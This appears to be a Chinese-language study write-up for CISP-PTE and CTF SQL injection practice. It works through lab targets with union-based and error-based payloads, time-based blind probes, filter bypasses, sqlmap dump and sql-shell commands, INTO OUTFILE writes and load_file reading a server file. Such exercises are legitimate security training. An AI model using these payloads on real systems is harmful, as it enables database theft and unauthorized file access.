文章目录
【CISP-PTE】SQL注入练习题
1. 今年的春节,不同往年
http://140.210.203.168:28881
1.1 手工注入
题目明确提示过滤了注释符 # –
- 通过单引号闭合,并注释绕过
闭合
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1=1
回显sql
select * from Article where uuid = '983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1'
闭合
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1
闭合成功
2. 爆列
逐一尝试
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,3,4,5 or 1='1
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,3,4,5,6 or 1='1
发现列数为6时,回显字段2
3. 爆库
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,database(),3,4,5,6 or 1='1
爆出库名为 web
4. 爆表
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='2web'),3,4,5,6 or 1='1
爆出有两个表 Article IS_KEY
5. 爆表is_key的列
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='2web' and table_name='IS_KEY'),3,4,5,6 and 1='1
爆出列为haha
6. 爆字段
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(haha) from IS_KEY ),3,4,5,6 and 1='1
得到key1:abcd1234
1.2 sqlmap 注入
- 注入
python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5
- 爆库
python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 --current-db
- 爆表
python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web --tables
- 爆列
python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web -T IS_KEY --columns
- 爆字段
python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web -T IS_KEY -C"haha" --dump
2.文章发布系统
http://140.210.203.168:17111/admin.php
sqlmap注入
爆库
python sqlmap.py -u “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5 --current-db
爆表
python sqlmap.py -u “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5 -D 2web --tables
爆列
python sqlmap.py -u “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5 -D 2web -T users1 --columns
爆字段
python sqlmap.py -u “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5 -D 2web -T users1 -C“XremarkX4354” --dump
3. 文章发布系统2
sqlmap注入并执行sql-shell
http://118.195.198.108:20000
注册用户
发布文章抓包保存为sql.txt
sqlmap爆库
python sqlmap.py -r sql.txt --risk 3 --level 5 --current-db
爆表
python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web --tables
爆列
python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web -T users1 --columns
爆字段
python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web -T users1 -C“username,ox3a,password” --dump
发现无法爆出字段
总结已获得的信息 库 2web 表 users1 列 username password
sqlmap执行sql shell
python sqlmap.py -r sql.txt --sql-shell
select * from 2web.users1 limit 1 或者 select * from 2web.users1 where username='admin'
或者 直接sqlmap执行sql
python sqlmap.py -r sql.txt -sql-query="select * from 2web.users1 limit 1"
4. [第一章 web入门]SQL注入-1
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81
union联合注入
闭合
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 #
发现# 被过滤
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 %23
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 --+
%23 和--+未被过滤 闭合成功
爆列
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' order by 30 --+
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' order by 3 --+
爆出列数为3
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' union select 1,2,3 --+
得到字段列数为3
回显
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,2,3 --+
爆库
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,database(),3 --+ 得到库名 note
爆表
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='note'),3 --+
得到两张表 fl4g,notes
爆字段
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='note' and table_name='fl4g'),3 --+
得到字段名为 fllllag
爆字段值
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(fllllag) from fl4g),3 and 1=1 --+
得到 flag n1book{union_select_is_so_cool}
5.sqlilabs 1-15
updatexml
extractvalue
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1
闭合
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1 and 1=1 %23
#被过滤
报错注入 爆库
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,database()),1) %23
爆表
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1) %23
发现一次只能回显1行,用limit逐一爆
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1) %23
emails
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 2,1)),1) %23
uagents
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 3,1)),1) %23
users
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 1,1)),1) %23
referers
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 4,1)),1) %23
为空 说明只有四个表
报字段
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1)),1) %23
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 1,1)),1) %23
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 2,1)),1) %23
爆出三个字段 id username password
爆字段内容
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users limit 0,1)),1) %23
XPATH syntax error: '~Dumb:Dumb,Angelina:I-kill-you,D'
发现回显内容被截取,结果显示不全,参考文档
https://www.wolai.com/ctfhub/qXx5vurg8fRgasaZAVDo8W
MID()函数用于从文本字段中提取字符。 SELECT MID(column_name,start[,length]) FROM table_name;
- Less-1 字符型注入
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-1/?id=1’ order by 5 --+ - Less-2 数字型注入
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-2/?id=1 order by 5 - less-3 ‘)闭合
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-3/?id=1’) --+ - less-4 “)闭合
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-4/?id=1”) --+ - Less-5 报错注入
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-5/?id=1’ and updatexml(1,concat(1,database()),1) --+
http://node2.anna.nssctf.cn:28656/Less-5/?id=1’ and updatexml(1,concat(0x7e,(select email_id from emails limit 8,1)),1) --+ - Less-6 报错注入 “闭合
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-6/?id=1” and updatexml(1,concat(0x7e,database()),1)–+ - Less-7 outfile
Less-7/?id=-1’ union select 1,2,@@datadir – # 获取数据存储路径
Less-7/?id=-1’ union select 1,2,@@basedir – # 获取安装路径
Less-7/?id=1’)) union select 1,2,3 into outfile “C:\phpStudy\WWW\sqli\Less-7\test.txt” – #
sqlmap --slq-shell - Less-8 布尔盲注 sqlmap
- Less-9 时间盲注 sqlmap
?id=1’ and sleep(5) – - #延迟5s
?id=1‘’ and sleep(5) – -
?id=1 and sleep(5) – -
?id=1‘) and sleep(5) – -
?id=1‘‘) and sleep(5) – -
?id=1’ and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)=‘i’,sleep(3),1)-- - - Less-10 时间盲注 sqlmap
?id=1” and sleep(5) --+ - Less-11 报错注入
’ and updatexml(1,concat(0x7e,database()),0) # - Less-12 闭合判断
") union select database(),2 # - Less-13 闭合判断 1’) or 1=1 #
1’) and updatexml(1,concat(0x7e,(select database()),0x7e),1)# - Less-14 闭合判断 1“ or 1=1 #
1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
6 宽字节注入 [极客大挑战 2019]HardSQL 1
http://8c4f169a-d2ef-4cdd-bd7f-74431c549dcc.node4.buuoj.cn:81/check.php?username=1&password=1%27or(updatexml(1,concat(0x7e,database()),1))%23
7. sql 文件读取
http://192.168.213.22:81
通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。
注入判断
http://192.168.213.22:81/vulnerabilities/fu1.php?id=1' 报错,存在注入点,回显sql select * from article where id= ('1'')
闭合
--+ # 均被过滤
;%00 闭合成功
http://192.168.213.22:81/vulnerabilities/fu1.php?id=1');%00
或者 (空格被过滤 用/**/或者%0a)
http://192.168.213.22:81/vulnerabilities/fu1.php?id=1') /**/or/**/1=('1
爆字段个数
http://192.168.213.22:81/vulnerabilities/fu1.php?id=1') /**/order//by/**/4;%00
union回显
union被过滤 双写绕过
http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1') //ununionion//select/**/1,2,3,4;%00
读取key文件 key:8b3h4a7v
http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1') //ununionion//select/**/1,2,3,load_file("/tmp/360/key");%00